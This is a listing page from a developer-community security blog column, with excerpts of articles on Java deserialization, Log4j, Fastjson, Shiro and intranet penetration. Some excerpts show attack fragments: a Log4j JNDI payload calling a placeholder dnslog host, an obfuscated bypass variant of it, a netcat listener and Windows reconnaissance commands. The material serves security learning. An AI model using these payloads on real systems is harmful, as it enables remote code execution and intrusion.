腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
Naraku的专栏
Web安全学习笔记
专栏作者
举报
65
文章
81418
阅读量
14
订阅数
订阅专栏
申请加入专栏
全部文章(65)
网络安全(28)
安全(17)
编程算法(15)
php(12)
文件存储(11)
网站(11)
https(11)
http(10)
java(9)
sql(8)
python(7)
数据库(7)
tcp/ip(7)
git(6)
github(5)
访问管理(5)
javascript(4)
云数据库 SQL Server(4)
开源(4)
shell(4)
bash(3)
css(3)
html(3)
json(3)
android(3)
flask(3)
api(3)
bash 指令(3)
hashmap(3)
腾讯云开发者社区(3)
actionscript(2)
linux(2)
apache(2)
spring(2)
命令行工具(2)
jvm(2)
ssh(2)
dns(2)
微信(2)
对象存储(1)
官方文档(1)
c++(1)
xml(1)
云数据库 Redis(1)
web.py(1)
打包(1)
tomcat(1)
unix(1)
centos(1)
nginx(1)
容器镜像服务(1)
腾讯云测试服务(1)
企业(1)
渲染(1)
xslt & xpath(1)
容器(1)
黑客(1)
爬虫(1)
jdk(1)
sql server(1)
spring boot(1)
flash(1)
iis(1)
spring cloud(1)
socket编程(1)
kerberos(1)
powershell(1)
windows(1)
unicode(1)
ascii(1)
迁移(1)
验证码(1)
exe(1)
invoke(1)
搜索文章
搜索
搜索
关闭
Spring Cloud Gateway内存马注入
spring
spring cloud
安全
shell
网络安全
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式 以下版本的Spring Cloud Gateway存在SPEL表达式注入漏洞CVE-2022-22947,可导致未授权远程命令执行漏洞
Naraku
2022-09-08
2.3K
0
Java安全-反序列化-4-CC6
文件存储
编程算法
hashmap
java
android
上一篇文章中通过AnnotationInvocationHandler#invoke方法来触发LazyMap#get方法,而AnnotationInvocationHandler这个类在高版本Java(8u71以后)进行了修改,导致该利用链无法利用。 这里讲另一个相对比较通用的Gadget:CommonCollections6,这个Gadget使用了另一个类org.apache.commons.collections.keyvalue.TiedMapEntry,该类在其hashCode方法中调用了getValue,而在getValue中调用了this.map.get,即可以调用LazyMap#get方法。
Naraku
2022-04-26
467
0
Java安全-反序列化-5-CC3
php
文件存储
java
正常情况下,Java会根据配置项sun.boot.class.path和java.class.path中列举到的基础路径(这些路径是经过处理后的java.net.URL类)来寻找.class文件来加载,而这个基础路径有三种情况:
Naraku
2022-04-26
373
0
Java安全-反序列化-3-CC1
android
java
http
css
文件存储
如果想劫持一个对象内部的方法调用,需要用到java.reflect.Proxy#newProxyInstance
Naraku
2022-04-17
387
0
Java安全-反序列化-2-CC
文件存储
hashmap
java
android
网络安全
TransformedMap,⽤于对Map类型的对象做修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。 如下,传入变量innerMap,返回outerMap。outerMap在添加新元素时,keyTransformer是处理新元素的Key的回调,valueTransformer是处理新元素的Value的回调,处理后得到的返回值才会被添加进outerMap中
Naraku
2022-04-14
297
0
Java安全-反序列化-1-URLDNS
文件存储
dns
php
编程算法
hashmap
Java在序列化对象时,将会调用这个对象的writeObject方法,参数类型是ObjectOutputStream,开发者可以将任何内容写入这个Stream中;反序列化时,也会调用这个对象的readObject方法,可以读取到前面写入的内容并进行处理
Naraku
2022-04-14
197
0
Java安全-RMI篇
文件存储
tcp/ip
java
jvm
发起一次RMI通信,Server端192.168.111.1,Client端192.168.111.2
Naraku
2022-04-01
776
0
Java安全-反射篇
编程算法
java
c++
forName不是获取“类”的唯⼀途径,通常有三种⽅式获取⼀个“类”,也就是java.lang.Class对象:
Naraku
2022-03-29
573
0
Xray PoC
编程算法
https
网络安全
脚本编写 建议先过一遍参考文档:https://docs.xray.cool/#/guide/poc/v2 YAML 一种可读的序列化数据,类似JSON。参考:YAML - Wiki 特点 大小写敏感 可以使用#号注释 使用缩进表示层级关系,缩进不允许使用Tab,可以用空格 关于YAML字符串转义:https://stackoverflow.com/questions/3790454/ 基本信息 文件命名格式为:组件-编号-漏洞类型.yml,如:node-cve-2017-14849-fileread.ym
Naraku
2022-03-03
1.8K
0
Log4j-JNDI注入RCE
https
javascript
网络安全
安全
github
漏洞简介 影响版本 Apache Log4j 2.14.1 Apache Log4j Security Vulnerabilities log4shell - Quick Guide 漏洞利用 Log4j 2.14.1 - RCE CVE-2021-44228 POC ${jndi:ldap://xxx.dnslog.cn/exp} # Bypass ${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp} RCE 首先Netcat监听端口 $ nc -lvn
Naraku
2022-02-24
1.6K
0
Vulnstack3
python
https
centos
linux
添加完网卡后打开虚拟机会连接到VMnet2网卡(如果没有就手动连一下)。其中Web-Centos为出网机,需要重新获取IP,然后Ping测试一下各主机连通性
Naraku
2022-02-14
1.4K
0
Kerberos基础入门
kerberos
当Client想要访问Server上的某个服务时,需要先向AS证明自己的身份,然后通过AS发放的TGT向Server发起认证请求,这个过程分为三块:
Naraku
2022-02-03
1K
0
语雀迁移至Obsidian
编程算法
python
腾讯云开发者社区
https
网络安全
之前一直使用Typora+各种博客(Wordpress/Hexo/Typecho)来进行笔记和写作,后来接触并爱上了语雀,主要是贴图太方便了。(使用Typora的时候会搭配PicGo+云存储,但是有时候会粘贴了多余的图片或者想替换已有图片时,懒得打开云存储进行删除,久而久之就忘了,造成了一定的空间浪费。) 刚开始用语雀的时候还特地看了下,可以导出md格式的文章。但最近想批量导出知识库时,发现只能选择PDF或者语雀特定的格式,数据不在自己手里感觉不大放心。于是弄了个脚本通过语雀官方API导出了全部文章,并开始寻找本地存储的笔记软件。 结合个人情况进行筛选后发现Obisidian比较适合,但是一开始不会用,不会怎么处理图片路径的问题。语雀是没有目录这个概念的,所以导出的文章都放到了一起,然后图片等资源也统一放到了文章目录中的某一目录。而如果我在Obsidian里通过建立多级文件夹的方式来分类文章,那么所有图片资源的链接都要进行改动,差点弃坑了。还好在B站看了关于ob的视频,学到了通过索引的方式来进行管理。
Naraku
2022-01-20
4.3K
0
Crawlergo_X_Xray
http
python
bash
bash 指令
环境 Ubuntu20.04+Python3 Xray Crawlergo Crawlergo_X_Xray Httprobe 前期准备 # 安装依赖 $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get install unzip git tree $ sudo apt install python3 # Python3 $ sudo apt install python3-pip
Naraku
2021-07-29
554
0
Weblogic-CVE-2021-2109
网站
tcp/ip
http
安全
网络安全
影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1
Naraku
2021-07-29
658
0
实习记录(一) - 内网渗透之Neo-reGeorg
网络安全
python
tcp/ip
如果要使用BurpSuite抓包进行如暴力破解等操作,还需要另外配置一下BurpSuite的代理
Naraku
2021-07-29
1.7K
0
实习记录(二) - Shiro反序列化漏洞
文件存储
安全
网站
java
编程算法
背景:最近公司的师傅丢了个内网渗透的靶场让我们玩,需要通过对外映射的Web服务打进去。一开始看到是一个JeeCMS的站点,直接弱口令就进了后台。但是瞎搞一通都拿不到Shell。搜索了一番才知道原来方向错了,其实是一个Shiro反序列化的漏洞。 漏洞概述 Shiro使用 CookieRememberMeManager这个类对Cookie中的 remeberMe进行 序列化 => 使用密钥进行AES加密 => Base64编码,最后返回客户端 remebreme Cookie。在识别用户身份时需要对 remem
Naraku
2021-07-29
1.6K
0
实习记录(四) - Fastjson反序列化漏洞
文件存储
网络安全
dns
编程算法
json
Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 JavaBean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 漏洞检测 DNSLog回显 通过构造DNS解析来判断是否是Fastjson,Fastjson在解析下面这些Payload时会取解析val的值,从而可以在dnslog接收到回显,以此判断是不是Fastjson {"a":{"@type":"java.net.Inet4Address","val":"xxx.dnsl
Naraku
2021-07-29
2.2K
0
实习记录(五) - AJP协议文件读取漏洞
tomcat
网络安全
安全
apache
http
Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。而Tomcat服务器8009端口上的AJP协议存在漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
Naraku
2021-07-29
821
0
内网信息收集
api
exe
invoke
基本信息 # 网络信息 $ ipconfig /all # 查询网络配置信息 # 系统信息 $ systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" # 查询操作系统和软件信息 $ systeminfo # 查看补丁列表 $ wmic qfe get Caption,Description,HotFixID,InstallOn # 查看安装在系统的补丁 # 服务信息 $ wmic service list brief # 查询本机服务信息 $
Naraku
2021-07-29
738
0
点击加载更多
社区活动
腾讯技术创作狂欢月
“码”上创作 21 天,分 10000 元奖品池!
立即发文
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档